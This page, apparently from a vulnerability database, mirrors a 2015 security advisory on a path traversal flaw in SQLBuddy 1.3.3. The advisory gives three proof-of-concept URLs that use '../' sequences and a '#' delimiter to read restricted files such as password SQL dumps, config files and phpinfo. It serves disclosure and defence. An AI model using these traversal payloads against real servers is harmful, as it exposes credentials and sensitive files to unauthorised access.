Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

SQLBuddy 1.3.3 Path Traversal

🗓️ 15 May 2015 00:00:00Reported by hyp3rlinxType 
packetstorm
 packetstorm🔗 packetstormsecurity.com👁 23 Views

SQLBuddy 1.3.3 Path Traversal vulnerability allows directory traversal to access sensitive files and directories.

Code
`# Exploit Title: Path traversal vulnerability  
# Google Dork: intitle:path traversal  
# Date: 05-08-2015  
# Exploit Author: John Page (hyp3rlinx)  
# Website: hyp3rlinx.altervista.org/  
# Vendor Homepage: http://www.sqlbuddy.com  
# Software Link: http://www.sqlbuddy.com  
# Version: 1.3.3  
# Tested on: windows 7  
# Category: webapps  
  
Source:  
====================================  
http://hyp3rlinx.altervista.org/advisories/AS-SQLBUDDY0508.txt  
  
  
  
Advisory Information:  
==============================  
sqlbuddy suffers from directory traversal whereby a user can move about  
directories an read any PHP and non PHP files by appending  
the '#' hash character when requesting files via URLs.  
  
e.g. .doc, .txt, .xml, .conf, .sql etc...  
  
After adding the '#' character as a delimiter any non PHP will be returned  
and rendered by subverting the .php concatenation used  
by sqlbuddy when requesting PHP pages via POST method.  
  
Normal sqlbuddy request:  
http://localhost/sqlbuddy/home.php?ajaxRequest=666&requestKey=<xxxxxxxxxx>  
  
  
POC exploit payloads:  
=======================  
  
1-Read from Apache restricted directory under htdocs:  
http://localhost/sqlbuddy/#page=../../../restricted/user_pwd.sql#  
  
2-Read any arbitrary files that do not have .PHP extensions:  
http://localhost/sqlbuddy/#page=../../../directory/sensitive-file.conf#  
  
3-Read phpinfo (no need for '#' as phpinfo is a PHP file):  
http://localhost/sectest/sqlbuddy/sqlbuddy/#page=../../../../xampp/phpinfo  
  
  
  
Severity Level:  
===============  
High  
  
  
Request Method(s):  
[+] POST  
  
Vulnerable Product:  
[+] sqlbuddy 1.3.3  
  
Vulnerable Parameter(s):  
[+] #page=somefile  
  
Affected Area(s):  
[+] Server directories & sensitive files  
  
  
  
  
Disclaimer:  
=========================  
The information provided in this advisory is provided as it is without any  
warranty. the security research reporter John Page disclaims all  
warranties, either expressed or implied, including the warranties of  
merchantability and capability for a particular purpose. apparitionsec or  
its suppliers are not liable in any case of damage, including direct,  
indirect, incidental, consequential loss of business profits or special  
damages.  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
15 May 2015 00:00Current
7.4High risk
Vulners AI Score7.4
sqlbuddypath traversaldirectory traversalsensitive filesserver directoriespost methodhigh severity
23